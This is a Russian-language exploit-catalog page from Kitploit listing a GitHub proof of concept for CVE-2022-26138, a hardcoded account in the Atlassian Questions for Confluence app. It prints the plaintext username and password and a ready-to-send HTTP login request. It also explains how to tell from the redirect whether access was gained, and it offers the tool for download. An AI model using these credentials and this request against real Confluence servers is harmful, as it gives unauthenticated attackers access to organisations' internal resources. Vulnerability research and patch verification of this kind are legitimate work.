Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26138 — Atlassian Questions Жестко заданный пароль (CVE-2022-26138) | Kitploit
Инструменты/GitHubGitHub/alcaparra/cve-2022-26138
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubalcaparra/cve-2022-26138

CVE-2022-26138

Atlassian Questions Жестко заданный пароль (CVE-2022-26138)

Репозиторий
311034 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-26138 POC

questions_cve

Описание

root@kitploit:~
Приложение Atlassian Questions For Confluence для Confluence Server и Data Center
создает учетную запись пользователя Confluence в группе confluence-users
с именем disabledsystemuser и жестко заданным паролем. Удаленный
неаутентифицированный злоумышленник, знающий жестко заданный пароль,
может использовать это для входа в Confluence и получения доступа ко всем
ресурсам, доступным пользователям группы confluence-users.
Эта учетная запись создается при установке версий 2.7.34, 2.7.35 и 3.0.2 приложения.

POC

Жестко заданные учетные данные:

  • Пользователь: disabledsystemuser
  • Пароль: disabled1system1user6708

Эксплуатация

root@kitploit:~
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action

Если сервер перенаправляет на /vulnerable.action, учетные данные действительны.

Откуда вы взяли учетные данные?

Жестко заданные учетные данные находились в открытом виде внутри jar-файлов уязвимого плагина: https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar

Ссылки

  • https://www.cvedetails.com/cve/CVE-2022-26138/
  • https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
  • https://jira.atlassian.com/browse/CONFSERVER-79483
Скачать инструмент